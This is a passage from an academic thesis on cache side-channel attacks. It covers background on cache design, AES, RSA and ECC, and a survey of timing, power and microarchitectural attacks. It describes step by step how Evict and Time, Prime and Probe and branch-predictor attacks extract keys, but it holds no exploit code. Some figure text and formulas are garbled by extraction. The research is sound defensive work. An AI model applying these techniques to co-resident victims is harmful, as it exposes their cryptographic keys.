leakages in all AES, RSA and ECC implementations (CVEs 2016-7438, 2016-7439
and 2016-7440). Thus, our investigation played a key role on improving and updat-
ing several up-to-date security solutions that, otherwise, could have compromised
the privacy of their customers.
In summary, this work:
•Demonstrates the applicability of the Flush and Reload attack in virtualized
environments by recovering AES keys across cores in less than a minute
•Shows that cache attacks can go beyond cryptographic algorithms by attacking
three TLS implementations and re-implementing the closed Lucky 13 attack.
•Presents Invalidate and Transfer , a new attack targeting the cache coherency
protocol that works across CPU sockets. We demonstrate its viability by
recovering AES and RSA keys.
•Introduces the LLC Prime and Probe attack that does not require memory
deduplication to succeed. In order to successfully apply the Prime and Probe
attack, a thorough investigation on the architecture of LLCs is performed, in
particular on how cache slices are distributed. We also show how the Prime
and Probe attack succeeds in hypervisors where Flush and Reload was not able
to succeed, e.g., the Xen hypervisor.
4
•Shows, for the first time, the applicability of microarchitectural attacks in
commercial clouds. More precisely, we demonstrate how to recover a RSA key
across co-resident VMs in Amazon EC2.
•Presents a cache leakage analysis tool to prevent the design of cryptographic
algorithms form leaking information. We found alarming results, as 50% of the
implementations showed cache leakages that could lead to full key extraction.
•Introduces MASCAT , a tool to detect microarchitectural attacks embedded in
apparently innocent looking binaries. MASCAT serves as a verification pro-
cess for official application distributors that want to ensure the sanity of the
binaries being offered in their repositories.
•proposes fixes (that have been adopted) to all the vulnerabilities discovered in
commercial software due to the previously mentioned contributions.
The rest of the thesis is distributed as follows. Chapter 2 describes the necessary
background to understand the attacks and defenses later developed. Related work,
both prior and concurrent to this thesis is presented in Chapter 3. Chapters 4, 5
and 6 describe the deployment of the Flush and Reload ,Invalidate and Transfer
and Prime and Probe respectively. Finally Chapter 7 describes the aforementioned
countermeasures.
5
Chapter 2
Background
This thesis includes a large description on how cache attacks can be applied across
cores to recover sensitive information belonging to a co-resident victim. In order to
aid the reader understand the attacks that will later be presented, this chapter gives
an introduction on the typical microarchitecture layout found in modern processors
and the attacks that were proposed prior to this thesis. Further, we give a description
of the most widely used cryptographic algorithms, as they will be under the attack
radar of our microarchitectural attacks in subsequent chapters.
2.1 Side Channel Attacks
Side channel Attacks (SCA) are attacks that take advantage of the leakage coming
from a covert channel during a secure communication. Typical attacks on a direct
channel involve brute forcing the key or social phishing. Instead, side channel attacks
observe additional information stemming from side channels that carry information
about the key. These side channel traces are then processed and correlated to either
obtain the full key or to reduce its search space significantly. Figure 2.1 shows the
overall idea, where two parties are trying to establish an encrypted communica-
tion over an insecure channel. Due to the leakage stemming from unintended side
channels, an attacker can at least try to use that information to obtain the key.
This leakage can come in many forms. Power and Electro Magnetic (EM) leak-
ages are common in embedded devices and smartcards and usually imply having
physical access to the device. Timing attacks can deduce information about a se-
cret distinguishing the overall process time, but they suffer from the huge amount
of noise in modern communication channels (e.g., the internet). microarchitectural
attacks, in general, try to obtain information from the usage of some microarchi-
tectural resource. Although they require physical co-residence with the targeted
process, they do not need physical access to the device. In fact, several scenarios
can arise in which malicious code is executed alongside a potential victim in the
same physical machine. Other leakage forms are less common, e.g. sound or ther-
6
Figure 2.1: Side channel attack scenario. Instead of the direct channel, leakage
coming from side channels are exploited to obtain information about the key. Figure
from [Mic].
mal, but are constantly being studied to increase the applicability of side channel
attacks [KJJ99, BECN+04, KJJR11].
2.2 Computer Microarchitecture
Modern computers execute user specified instructions and data in a Central Pro-
cessing Unit (CPU), store the necessary memory to execute software in DRAM and
interact with the outside world trough peripherals. With a constantly evolving mar-
ket and strong competitors fighting for the same marketplace, efficiency has become
one of the main goals of every microarchitecture designer. In fact, several hardware
resources have been added to the basic microarchitectural components, e.g., caches
or Branch Prediction Units (BPU), to provide a better performance. Further, mod-
ern microarchitectures now embed several processing units in the same processor,
some of which are even capable of processing to threads concurrently. Even further,
lately we have observed the rise of multi-CPU socket computers, in which more
than one CPU sockets are embedded into the same piece of hardware. All these
technological advances have the same goal: offer the end-user the best computing
performance.
A typical microarchitecture design commonly found in modern processors can be
observed in Figure 2.2. The example shows a dual socket CPU, each CPU having
two cores. Each CPU core has private L1 and L2 caches, while they share the Last
Level Cache (LLC). Further each core has its own BPU, in charge of predicting the
outcome of the branches being executed. The communication between the cache
hierarchy and the memory is done through the memory bus, which is also in charge
of maintaining coherency between shared blocks across CPU sockets. Finally, the
7
L1 
Instruction 
CacheL1 
Data
Cache
L2 Cache
Branch Prediction Unit
Predictor
 BTB
L1 
Instruction 
CacheL1 
Data
Cache
L2 Cache
Branch Prediction Unit
Predictor
 BTB
L3 CacheL1 
Instruction 
CacheL1 
Data
Cache
L2 Cache
Branch Prediction Unit
Predictor
 BTB
L1 
Instruction 
CacheL1 
Data
Cache
L2 Cache
Branch Prediction Unit
Predictor
 BTB
L3 Cache
Memory Bus
DRAM
CPU Socket 1
 CPU Socket 2
Core 1
 Core 2
 Core 1
 Core 2Figure 2.2: Typical microarchitecture layout in modern processors
DRAM stores the necessary instructions and data that the program being executed
needs.
Although each component requires a exhaustive and thorough analysis, we put
our focus in caches, as they are the core component being examined in this thesis.
Nevertheless, some of the functionalities of the aforementioned components will
indeed be described later in greater detail in the thesis when needed.
2.2.1 Hardware Caches
Hardware caches are small memories placed between the DRAM and the CPU cores
to store data and instructions that are likely to be reused soon. When the software
needs a particular memory block, the CPU first checks the cache hierarchy looking
for that memory block. If found, the memory block is fetched from the cache and
the access time is significantly faster. If the memory block was not found in the
cache hierarchy, then it is fetched from the DRAM at the cost of a slower access
time. These two scenarios are often called a cache hit and a cache miss respectively.
At this point the main question is probably how much faster cache accesses are
over DRAM accesses. This can be observed in Figure 2.3, for which we performed
consecutive timed accesses to a L1 and L3 cached memory block and an uncached
memory block in an Intel i5-3320M. The access time for the L1 cache is about 3
cycles, for the L3 cache is around 7 cycles, while an access to the memory takes
around 25 cycles. Thus, an access to the DRAM is about 3 times slower than an
access to the lowest cache level, which gives an idea of the performance improvement
8
051015202530354000.10.20.30.40.50.60.70.80.91
Hardware cyclesProbability
  
data in cache
data in L3 cache
data in memoryFigure 2.3: Reload timing distribution when a memory block is loaded from the: L1
cache, L3 cache and memory. The experiments were performed in an Intel i5-3320M.
that the cache hierarchy offers to software execution.
In particular, caches base their functionality in two main principles: spatial
locality and temporal locality . While the first principle states that data residing
close to the data being accessed is likely to be accessed soon, the latter assumes
that recently accessed data is also likely to be accessed soon. Caches accomplish
temporal locality by storing recently accessed memory blocks, and spatial locality by
working with cache lines that load both the needed and neighbor data to the cache.
In consequence, the cache is usually divided into several fixed size cache lines.
However, caches can have very different design characteristics. In the following
we describe how their functionality changes for different design choices.
2.2.1.1 Cache Addressing
One of the most important decisions in the design of a cache is how is this distributed
and addressed. In this sense there are three main design policies:
•Direct mapped caches: In this case, each memory block has a fixed location
in the cache, i.e., they can occupy only one specific cache line.
•Fully associative cache: In this case a memory block can occupy anyof the
cache lines in the cache.
•N-way set associative cache: This is the most common design in modern
processors. This design splits the cache into equally sized partitions called
9
cache sets , each allocating ncache lines. In this case, a memory block is
constrained to occupy one of the ncache lines of a fixed set.
Each of the designs has advantages and disadvantages. For instance, the memory
block search in a direct mapped cache is very efficient as the CPU has to check only
one location. In contrast, in a fully associative cache the CPU will have to search for
a memory block in allthe cache lines. However, direct mapped caches suffer from
collisions, as they always trigger cache misses for consecutive accesses to cache line
colliding memory blocks. Fully associative caches do not suffer from this problem,
as any block can occupy any location in the cache. Thus, it is understandable that
the most common choice in modern processors is the n-way set associative cache, as
it balances the advantages and disadvantages of the first two designs.
2.2.1.2 Cache Replacement policy
Another fundamental aspect in the design of n-way set associative caches is the
algorithm that selects the block being evicted within a set. Recall that each set has
npossible memory blocks that can be evicted to make room for a new one. The
most common algorithms designed for this purpose are:
•Least Recently Used: This algorithm evicts the memory block that has
been longer time without being accessed by taking count of the number of
accesses being made to each nways in the set.
•Round Robin: Also known as First-In First-Out (FIFO), which evicts the
memory block that has reside for longer in the cache.
•Pseudo-random: The selection of the memory block to be evicted is done
with a pseudo-random algorithm.
Note that, in the case of cache attacks, the knowledge of the algorithm might be
crucial for the success of the attack. In fact, some cache attacks like the Prime and
Probe can be challenging to implement with random replacement policies, as the
occupancy of the memory blocks in the cache cannot be predicted. In this thesis,
we focus on x86 64 architectures which implement a LRU eviction policy.
2.2.1.3 Inclusiveness Property
The last but perhaps most important property that cache designers need to take into
account is whether they feature inclusive, non-inclusive or exclusive caches. This
has severe implications, among others, in the cache coherency protocol:
•Inclusive caches : Inclusive caches are those that require that any block that
exists in the upper level caches (i.e., L1 or L2) have to also exists in the
LLC. Note that this has several simplifications when it comes to maintain the
10
cache coherency across cores, since the LLC is shared. Thus, the inclusiveness
property itself is in charge of keeping a coherency between shared memory
blocks across CPU cores. The drawback of inclusive caches is the additional
cache lines wasted with several copies of the same memory block.
•Exclusive caches : Exclusive caches require that a memory block only resides
at one cache level at a time. In contrast to inclusive caches, here the cache
coherency protocol has to be implemented with upper level caches as well.
However, they do not waste cache space to maintain several copies of the
same block.
•Non-inclusive caches : This type of caches do not have any requirement,
but a memory block can reside in one or more cache levels at a time.
Whether the cache features the inclusiveness property might also be a key factor
when implementing cache attacks. In fact, as it will be explained in later sections,
attacks like Prime and Probe might only be applicable in inclusive caches, while
other attacks like Invalidate and Transfer are agnostic of the inclusiveness property.
2.3 The Cache as a Covert Channel
This thesis presents, among others, the utilization of the LLC as a new covert
channel to obtain information from a co-resident user. It is thus important to see
how the cache can be utilized as a covert channel to recover information, and in
particular, how previous works have done it. The first thing we should clarify the
reader is that the knowledge of which set a victim has utilized can lead to key
extraction. For instance, key dependent data that always utilizes the same set can
reveal the value of the key being processed if such a utilization of the set is observed.
Based on this, research previous to this thesis that has demonstrated in the past
the application of spy processes in core-private resources like the L1 cache to obtain
fine-grain information have being based in two main attacks:
2.3.1 The Evict and Time attack
The Evict and Time attack was presented by [OST06] as a methodology to recover
a complete AES key. In particular, the work demonstrated that key dependent T-
table accesses in the AES implementation (see Section 2.4) can lead to knowledge
of the key. The methodology utilized can be described as:
1. The attacker performs a full AES encryption with a known fixed plaintext
and an unknown fixed key. After this step, all the data utilized by the AES
encryption resides in the cache.
11
     Evict
     Time
Cache Cache CacheFigure 2.4: Evict and Time procedure
2. The attacker evicts a specific set in the cache. Note that, if this specific set
was used by the AES process the data utilized by it will no longer reside in
the cache.
3. The attacker performs the same encryption with the same plaintext and key,
and measures the time to complete the encryption. The time spent to perform
the encryption will highly depend on whether the attacker evicted a set utilized
by AES in step 1. If he did, then the encryption will take longer as the data
has to be fetched from the memory. If he did not, the attacker guesses that
the AES encryption does not use the set he evicted, possibly discarding some
key candidates.
Figure 2.4 graphically represents the states described. The victim first utilized
the yellow memory blocks, while the attacker evicts one of them in the eviction
process. When she times the victims process again, she sees the victim needed a
block from the memory and infers the victim uses the set she evicted. Note that
in this case the attacker has to record two encryptions with the same plaintext and
key, which might not be entirely realistic. Further, as the leakage comes from the
ability to measure the overall encryption time, the attack is not considered overly
practical.
12
2.3.2 The Prime and Probe Attack
The Prime and Probe attack was again proposed in [OST06], but later was utilized
by [Acı07, RTSS09, ZJRR12]. In a sense the attack is similar to Evict and Time ,
but only the monitorization of own memory blocks is required. This is a clear
advantage as it brings a more realistics scenario. These are the main steps:
1. The attacker fills the L1 cache with her own junk data.
2. The attacker waits until the victim executes his vulnerable code snippet. The
key dependent branch/memory access will utilize some of the sets filled by the
attacker in the L1.
3. The attacker accesses back his own memory blocks, measuring the time it
takes to access them. If the attacker observes high access times for some of
the memory blocks it means that the targeted software utilized the set where
those memory blocks resided. In contrast, if the attacker observes low access
times it means that the set remain untouched during the software execution.
This can be utilized to recover AES, RSA or El Gamal keys.
Once again the Prime and Probe steps can be graphically seen in Figure 2.5.
The attacker first fill the set with her red memory blocks, then waits for the victim
to utilize the cache (yellow block) and finally measures the time to reaccess her
red memory blocks. In this case she will trigger a miss in the probe step, meaning
the victim utilized the corresponding set. Note the the Prime and Probe attack
shows a much more practical scenario than Evict and Time , as no measurement to
the victims process is performed. However, as it was only applied in the L1 cache
(mainly due to some complications that will later be discussed) the community
still did not consider cache attacks practical enough to perform them in real world
scenarios.
2.4 Funcionality of Commonly Used Cryptographic
Algorithms
In this section we review the functionality of the three most widely used crypto-
graphic algorithms in every secure system: AES, RSA and ECC. The goal is to give
the reader enough background to understand the attacks that will later carried out
on these ciphers.
2.4.1 AES
AES is one of the most widely used symmetric cryptographic ciphers, a family of
ciphers that utilize the same key during the encryption and decryption. Symmetric
13
   Probe
   Prime
Cache Cache CacheFigure 2.5: Prime and Probe procedure
cryptography ciphers can clearly provide confidentiality , as they can encrypt a
message that only someone with access to the secret key is able to decrypt. Further,
symmetric key ciphers can also be utilized in Cipher Block Chaining (CBC) mode for
message integrity check, as symemtric key algoritm based Message Authentication
Codes (MACs) can be built [Dwo04]. These ensure that the message does not get
modified while being transmitted between two parties.
In particular, AES is part of the Rijndael cipher family, and as a block cipher,
it processes packages in blocks of 16 bytes. AES is composed of 4 main operations,
namely SubBytes, ShiftRows, Mixcolumns and AddRoundKey. The key can be of
128 ,192 and 256 bits, and depending on the length of the key, AES implements 10,
12 and 14 rounds of executions of the 4 main operation stages. The description of
these stages is:
•AddRoundKey: In this stage, the round key is XORed with the intermediate
state of the cipher.
•SubBytes: A table look up operation with 256 8 bit entry S-box.
•ShiftRows: In this stage the last three rows of ths state are shifted a given
number of steps.
•MixColumns: A combination of the columns of the state.
14
START
KEY
EXPANSION
ADDROUNDKEY
SUBBYTES
SHIFTROWS
MIXCOLUMNSNr=9,11,13
ADDROUNDKEY
SUBBYTES
SHIFTROWS
ADDROUNDKEY
ENDFigure 2.6: AES 128 state diagram with respect to its 4 main operations
Every round implements these 4 operations except the last one, in which a Mix-
Columns operation is not issued. Figure 2.6 represents the state diagram of a 10
round AES with respect to these operations.
However, often cryptographic library designers decide to merge the SubBytes,
ShiftRows and Mixcolumns operation into a Table look up operation and xor addi-
tions. The reason behind it is that, at the cost of a bigger table look up operation,
the AES encryption is computed faster, as more operations are precomputed. Nev-
ertheless the memory cost is usually affordable in smartphones, laptops, desktop
computers and servers. These tables allocate 256 32 bit values, and usually 4 tables
are utilized. We called these the T-tables. Some implementations even utilize a
difference table for the last round. Figure 2.7 shows an example of the output of 4
bytes in the last round utilizing 4 T-tables. Observe that the T-table entry utilized
directly depends on the key and the ciphertext byte, a detail that we will later utilize
to perform an attack on the last round.
In general, for the scope of microarchitectural attacks, we do not consider those
implementations based on the utilization of Intel AES hardware instructions (AES-
NI). These instructions are built in modern processors to perform all the AES op-
erations in pure hardware, i.e., without utilizing the cache hierarchy. Thus, any
microarchitectural attack applied to AES-NI would not succeed on obtaining the
key.
15
T0
 T1
 T2
 T3S010S510S1010S1510
K010K110K210K310
 C0  C1  C2  C3Figure 2.7: Last round of a T-table implementation of AES
2.4.2 RSA
RSA is the most widely used public key cryptographic algorithm. Public key cryp-
tosystems usually try to solve the symmetric cryptography key distribution problem.
Note that, symemtric key cryptography assumes that both parties share the same
secret, but it does not explain how that secret can indeed be shared. And that is
exactly where public key comes to place.
In public key (or asymmetric) crypto systems, in contrast to symmetric key
cryptography, each agent in the communication is assumed to have two keys; a
public key eand a private key d. The public key is publicly known, while the
private key is kept secret. The two keys are related in the sense that one decodes
what the other encoded, i.e., D(E(M)) =MandE(D(M)) =,. It is assumed that
revealing the public key does not reveal an easy information to compute D, and
therefore, only the user holding the private key can decrypt mesages encrypted with
his public key.
Assume the two agents willing to establish a secure communication are Alice and
Bob. With public key cryptography, if Alice wants to send an encrypted message
to Bob, she will have to encrypt the message with Bobs public key, as the message
is only decryptable by Bobs private key. That is, public key cryptography ensures
confidentiality between two comunicating agents.
The properties of public key cryptosystems also allow a user to digitally sign a
message. This signature proves that the sender is indeed the one who he claims he is,
i.e., public key cryptosystems also provide authenticity . Note that this is a feature
that symmetric key algorithms were not able to claim. For instance assumes that
Alice does not only wish to ensure confidentialy but also authenticity of their sent
messages. Alice in this case would first sign the message with her own private key,
and later encrypt it with Bobs public key C=Eb(Da(M)). Upon the reception of
this ciphertext Bob would decrypt the message with his own private key (which he
16
only knows) and verify the signature with Alice’s public key (proving that only Alice
could have signed the message), i.e., M=Ea(Db(C)). Therefore the communication
was not only encrypted but also authenticated.
In practice public key cryptosystems are usually utilized to distribute a shared
symmetric key between two agents, such that these can later ensure confidentiality
in their communication, since symmetric key cryptography is orders of magnitude
faster thatn public key cryptography.
In particular, RSA takes advantage of the practical difficulty of the factorization
of two large prime numbers to build a public key crypto system. Its operation is
based on modular exponentiations. An overview of the key generation algorithm
is presented in Algorithm 1 which starts by picking two distinct prime numbers p
andq, and calculating n=p∗qandφ(n) as (p−1)∗(q−1). The public key eis
chosen such that the greatest common divisor between eandφ(n) is equal to one.
Finally, the private key is chosen as the modular inverse of ewith respect to φ(n).
The resistance of RSA comes from the fact that, even if the attacker knows n, it is
computationally infeasible for him to recover the primes pandqthat generated it.
Algorithm 1 RSA key generation given prime numbers pandq
Input : Prime numbers pandq
Output : Public key eand private key d
n=p∗q;
φ(n) = (p−1)∗(q−1);
//Choosees.t:
1. 1<e<φ (n);
2.gcd(e,φ(n)) = 1;
d=e−1modφ(n);
returne,d,n
As we previously explained, messages are encrypted with public keys, performing
thec=memodnoperation, while the decryption involves a modular exponentation
with the private keys, i.e., m=cdmodn. Message signatures, in the other hand,
are performed with the private key s=mdmod (n) and verified with the public key
m=semodn.
The modular exponentiation can indeed be performed in several ways. One
way is to process the key bit by bit, and perform square and multiply operations
accordingly. A description of such an implementation is presented in Algorithm 2, in
which a square is always performed, and a multiplication with the base is performed
only when a set bit is found.
But processing the key bit by bit is not the only possibility to perform modular
exponentiations. Several implementations pre-compute some of the multiplicants in
a table such that less multiplications have to be issued during the key processing. An
example can be observed in Algorithm 3, in which values b,b2,b3,...,b2w−1are pre-
computed and stored in a table, being wthe window size. The key is then processed
17
Algorithm 2 Square and Multiply Exponentiation
Input : baseb, modulusN, secretE= (ek−1,...,e 1,e0)
Output :bEmodN
R=b;
fori=k−1downto 0do
R=R2modN;
ifei==1 then
R=R∗bmodN;
end
end
returnR;
in chunks of wbits,wsquares are issued together with a multiplication with the
appropriate table entry. This procedure is called fixed windowed exponentiation.
Algorithm 3 Fixed window exponentiation
function modpow (a,b);
Input : baseb, modulusN, secretE= (ek−1,...,e 1,e0)
Output :bEmodN
T[0] = 1;
v=b;
fori= 1to2w−1do
T[i] =T[i−1]∗v;
end
R= 1,i=k−1;
whilei>0do
S=eiei−1. . .ei−w;
R=R2wmodN;
R=R∗T[S] modN;
i=i−w;
end
returnR;
Typical sizes for RSA are 2048 and 4096 bits, while typical window sizes range
between 4 and 6. Indeed this is one of the main disadvantages of RSA; a good
security level is only achieved with very large keys. The following section describes
Elliptic Curve Cryptography (ECC), another public key crypto system that provides
the same level of security with much lower key sizes.
18
y
x
PQ
R=P+Qy=x3-3x+5Figure 2.8: ECC elliptic curve in which R=P+Q
2.4.3 Elliptic Curve Cryptography
Elliptic Curve Cryptography (ECC) also belongs to the category of public key cryp-
tographic algorithms. As with RSA, each user has a public and a private key pair.
However, while the security of RSA relied mainly in the large prime factorization
problem, ECC relies on the elliptic curve discrete logarithm problem : finding the
discrete logarithm of an element in an elliptic curve with respect to a generator is
computationally infeasible [HMV03, Mil86, LD00]. In fact, ECC achieves the same
level of security as RSA with lower key sizes . Typical sizes for ECC keys are 256 or
512 bits.
The communication peers have first to agree on the ECC curve that they are
going to utilize. A curve is just the set of points defined by an equation, e.g.,
y2=x3+ax+b. This equation is called the Weirstrass normal form of elliptic
curves. In elliptic curves we define addition arithmetic as follows:
•ifPis a point in the curve, −Pis just its reflection over the x axis.
19
Figure 2.9: ECDH procedure. ka∗kb∗Qis the shared secret key
•if two points PandQare distinct, then result of adding P+Q=Ris computed
by drawing a line crossing PandQ, which will intersect in a third point −R
in the curve. Ris computed by taking the reflection of −Rwith respect to
the x axis.
•P+Pis computed by drawing a tangent line to the curve at P, which again
will intersect in a third point in the curve −2P. 2Pis just the reflect-ion over
the x axis.
An example of an addition of two distinct points PandQis presented in Fig-
ure 2.8, in which the line crossing PandQintersects in a third point −R, for which
we calculate the negated value by taking its reflection over the x axis.
With the new ECC point arithmetic we can define, as with RSA, cryptosystems
based on the elliptic curve discrete logarithm problem. For all of them we assume
the two communication peers agree on a curve, a base point Qin the curve. Each
of them choose a scalar that will be their private key, while they while compute
the public key as k∗Q, beingkthe scalar and Qthe base point. Note that,the
resistance of ECC cryptosystems relies on the fact that, knowing Qandk∗Qit is
very difficult to obtain k.
With these parameters, the Elliptic Curve Diffie Hellman (ECDH) is easily com-
putable. In fact, both peers can agree on a shared key by performing ka∗Pband
kb∗Pa, wherekiandPiare private and public keys of peer i. The entire procedure
for ECDH can be observed in Figure 2.9. With similar usage of the ECC properties
digital signatures can also be performed.
20
Chapter 3
Related Work
The following section provides the state-of-the-art of classic as well as microarchi-
tectural side channel attack literature. Publications are grouped and discussed to
establish a comprehensive overview of scenarios and covert channels that have been
exploited to retrieve sensitive information.
3.1 Classical Side Channel Attacks
Classical Side Channel attacks were introduced by Kocher et al. [Koc96, KJJ99]
almost two decades ago and introduced a new era of cryptography research. Before
the discovery of side channel attacks, the security of cryptographic algorithms was
studied by assuming that adversaries only have black box access to cryptographic de-
vices. As it turned out, this model is not sufficient for real world scenarios, because
adversaries have additionally access to a certain amount internal state information
which is leaked by side channels. Typical side channels include the power con-
sumption, electromagnetic emanations and timing of cryptographic devices. In the
following we give an overview on how these have been implemented with respect to
timing and power side channel attacks.
3.1.1 Timing Attacks
Timing side channel attacks take advantage of variations in the execution time of
security related processes to obtain information about the secret being utilized.
These variations can arise due to several factors, e.g., cache line collisions or non-
constant execution flows. For instance, Kocher [Koc96] demonstrated that execution
time variations due to non-constant execution flow in a RSA decryption can be
utilized to get information about the private key. Similar instruction execution
variations were exploited by Brumley and Boher [BB03] in a more realistic scenario,
i.e., an OpenSSL-based web server Later, Bernstein [Ber04] on the contrary exploited
timing variations stemming from cache set access time differences to recover AES
keys. In 2009 Crosby et al. [CWR09] expanded on [Koc96] reducing the jitter effect
21
from the measurements and therefore succeeded recovering the key with significantly
less traces. [BB03] was also further expanded in 2011 by Brumley et al. [BT11]
showing the ECC implementations can also suffer from timing variation leakage.
Timing attacks have also shown to recover plaintext messages sent over security
protocols like TLS, as demonstrated by Al Fardan and Paterson [FP13].
3.1.2 Power Attacks
During the last years, several attacks exploiting side channels were introduced. In
the following, the required steps in order to perform a successful attack are described.
Measurement
In the first step, the acquisition of one or more side channel traces is performed,
which results in discrete time series. The resulting traces represent physical proper-
ties of the device during execution such as the power consumption or electromagnetic
field strength on a certain position.
Pre-processing
In the second optional step, the raw time series can be enhanced for further pro-
cessing. In this step several techniques in order to reduce noise, remove redundant
information by compressing the data, transformations into different representations
like the frequency domain, and trace alignment are performed.
Analysis
The actual analysis step extracts information from the acquired traces in order to
support the key recovery. There are many more or less complex methods available,
which can be categorized with two orthogonal criteria. The first one is based upon
the requirement if multiple side channel traces are needed or a single trace is suf-
ficient to perform the attacks. The second criterion is based upon the question,
whether a training device is available to obtain the leakage characteristics or if the
attack is based on assumptions about the leakage characteristics. Table 3.1 shows
the four possible combinations of these criteria.
Table 3.1: Side channel attack classification according to utilized data analysis
method
Single Measurement Multiple Measurements
Non-ProfilingSimple Analysis (SPA,
SEMA)Differential Analysis (DPA,
DEMA, CPA, MIA, KSA)
Profiling Template Attacks (TA) Stochastic Approach (SA)
22
The most basic analysis is the simple power analysis (SPA) which only requires
one side channel trace and does not require profiling. The common way to perform
this kind of attack is by visual inspection of a plotted trace. The goal is to find
patterns in the trace caused by conditional branching with dependency on the secret
key. This attack works well with computations on large numbers as used by public
key cryptography.
The differential analysis method is very powerful by using statistics on multiple
side channel traces. These method does not need a profiling step and uses leakage
assumptions based on hypothetical internal values dependent on a small part of the
key. This way, an attacker can try out different assumptions about a part of the
key and compare the leakage assumptions with an actual observable leakage. The
statistical methods utilized to quantify the accuracy of the assumption are referred
as distinguishers in the side channel literature. The historically first distiguisher
was the distance of means test [KJJ99] that is used by the differential power at-
tack (DPA) and differential electromagnetic attack (DEMA). Later, more powerful
ones including Pearson correlation (for CPA) [BCO04], mutual information (MIA)
[GBTP08], and the Kolmogorov-Smirnov test (KSA) [WOM11] were introduced.
Attacks with a profiling step are based upon the assumption that the leakage
characteristics of the different devices of the same type are similar. Using a training
device, an attacker can model the leakage characteristics of the device and can
use this model for the actual attack. The historically first profiled attack was the
template attack (TA) [CRR03]. This method is based on multivariate Gaussian
models for all possible sub-keys. Template attacks allow key extractions based on
only one side channel trace after proper characterization of a training device.
The stochastic approach (SA) [SLP05, KSS10] approximates the leakage function
of the device using a linear model. The actual key extraction can be performed by
different methods. For example, in [SLP05] the maximum likelihood principle is
used. The linear model parameters can also be used to identify leakage sources in a
design as described by De Santis et al. [DSKM+13].
3.2 Microarchitectural Attacks
Microarchitectural attacks try to exploit specific features of computer microarchitec-
tures without requiring physical access to the device to recover cryptographic keys,
chasing the pattern of other processors and also threading the cloud users. The
focus of this section is put on hardware components that have been exploited in
microarchitectural attacks, which have exhibited a significant tendency change on
multi-core/CPU systems.
A rough description of the basic components in modern microarchitectures was
presented in Figure 2.2. Modern computers usually consist on one or more CPU
sockets, each containing several CPU cores. Processes are executed in one or several
cores at the same time. The Branch Prediction Unit (BPU) is in charge of mak-
23
ing predictions on possible outcomes of branches inside the code being executed.
L1/L2 and L3 caches, in order to avoid subsequent DRAM accesses, store data and
instructions that have recently being used, because they are very likely to be uti-
lized again. The memory bus is in charge of the communication between the cache
hierarchy and the DRAM, and further can possibly used to communicate the state
of shared memory across CPU sockets. Finally, the DRAM holds the memory pages
that are necessary for the execution of the program.
Particularly important for microarchitectural attacks is to identify which of these
components can serve as a covert channel to perform single-core, cross-core and
cross-CPU attacks. In fact, from the figure we can identify many of the covert
channels that will later be explained. For instance, it can be observed that an
attacker trying to exploit Branch Prediction Units (BPUs) or L1/L2 caches has to
co-reside in the same core as the victim, as they are core-private resources. A cross-
core attack can be implemented if the L3 cache is utilized as the covert channel,
since it is shared across cores. Finally, attacks across CPU sockets can be achieved
exploiting, among other components, the memory bus and the DRAM. All these
have been exploited in very different manners that will be explained in the following
section.
3.2.1 Hyper-threading
Hyper threading technology was introduced to perform multiple computations in
parallel by Intel in 2002. Each processor core has two virtual threads and they share
the work load of a process. The main purpose of hyper-threading is to increase the
number of independent instruction in the pipeline. In 2005, Percival et al. [Per05]
exploited this technology to establish a cache covert channel in L1-data cache. In
the same core but in different threads spy and crpytographic libraries are executed
and the spy code is able to recover some bits of the secret RSA exponent. In 2007,
Aciicmez et al. [AS07] proposed a new method to exploit the leakage in the hyper-
threading technology of Intel processors. To do this, they take advantage of shared
ALU’s large parallel integer multiplier between two threads in a processor core. Even
if they did not introduce a new vulnerability in OpenSSL library, they showed that
it is possible to use ALU as a covert channel in the secret exponent computation.
3.2.2 Branch Prediction Unit Attacks
Control hazards have an increasing impact on the performance of a CPU as the
pipeline depth increases. Efficient handling of speculative execution of instruc-
tions becomes a critical solution against control hazards. This efficiency is usually
achieved by predicting the most likely execution path, i.e., by predicting the most
likely outcome of a branch. Specifically, Branch Prediction Units (BPU) are in
charge of predicting the most likely path that a branch will take. BPUs are usually
divided into two main pieces: Branch Target Buffers (BTB) and the predictor. The
24
BTB is a buffer that stores the addresses of the most recently processed branches,
while the predictor is in charge of making the most likely prediction of the path.
As BPUs are accessible by any user within the same core, the BTB has become a
clear target to perform microarchitectural attacks. Imagine a BPU in which branches
that are not observed in the BTB are always predicted as not taken, and will only
be loaded into the TBT once the branch is taken. If a piece of code has a security
critical branch to be predicted, a malicious user can interact with the BTB (i.e., by
filling it) to ensure that the branch will be predicted as not taken. If the attacker
is able to measure the execution time of the piece of code, he will be able to say
whether the branch was misspredicted (i.e. the branch was taken) or the branch
was correctly predicted (i.e. the branch was not taken).
This is only one possible attack vector that can be implemented against the BPU.
A more realistic scenario is the one in which the attacker fills the TBT with always
taken branches (which evicts any existing branches from the TBT), then waits for
the victim to execute his security critical branch, and finally measure the time to
execute his always taken branches again. If the security critical branch was taken,
then the branch will be loaded into the TBT and one of the attackers branches will
be evicted, causing a missprediction that he will observe in the measured time. In
the other hand, if the security critical branch was not taken, it will not be loaded
into the TBT and the attacker will predict correctly all his branches. The two attack
models discussed have been proposed in [AKKS07, AKS07].
However, BPU microarchitectural attacks have a clear disadvantage when com-
pared to other microarchitectural attacks: BPU units are core-private resources.
Thus, these attacks are only applicable if attacker and victim co-reside in the same
core. Nevertheless, new scenarios arise in which core co-residency is easily achiev-
able, as TEE attacks (discussed in Section 3.2.12). Malicious OSs can control the
scheduling of the CPU affinity of each process. In fact, attacks utilizing BPU have
already been proposed in that scenario [LSG+16].
3.2.3 Out-of-order Execution Attacks
A recent microarchitectural side channel that was discovered and proved to establish
communication between co-resident VMs is the exploitation of out of order executed
instructions [D’A15]. Out of order execution of instructions is an optimization
present in almost all the processors that allows the finalization of a future instruction
while waiting for the result of a previous instruction. A first intuition of out-of-order
instructions finishing earlier than in-order instructions was made in [CVBS09]. As
with other microarchitectural attacks, optimizations can indeed open new covert
channels to be exploited by malicious attackers.
Assume two threads execute interdependent load and store operations into a
shared variable (i.e., one threads stores the value loaded by the other one). If
these threads run in parallel, three cases might arise: both threads are executed in-
order and at the same time, both threads are executed in-order but one is executed
25
faster or both threads execute out of order instructions. Note that the result of the
operations will be different for each of the outputs. Thus, a covert channel can be
established by transmitting a 0 when instructions are executed out of order, and
a 1 in any other case. Indeed, an attacker can ensure to transmit a 1 by utilizing
memory barrier instructions, which keep the execution of the instructions in-order.
3.2.4 Performance Monitoring Units
Performance Monitoring Units (PMU) are a set of special-purpose registers to store
the count of hardware and software related activities. In 1997, the first study was
conducted by Ammons et al. [ABL97] where the logical structure of hardware coun-
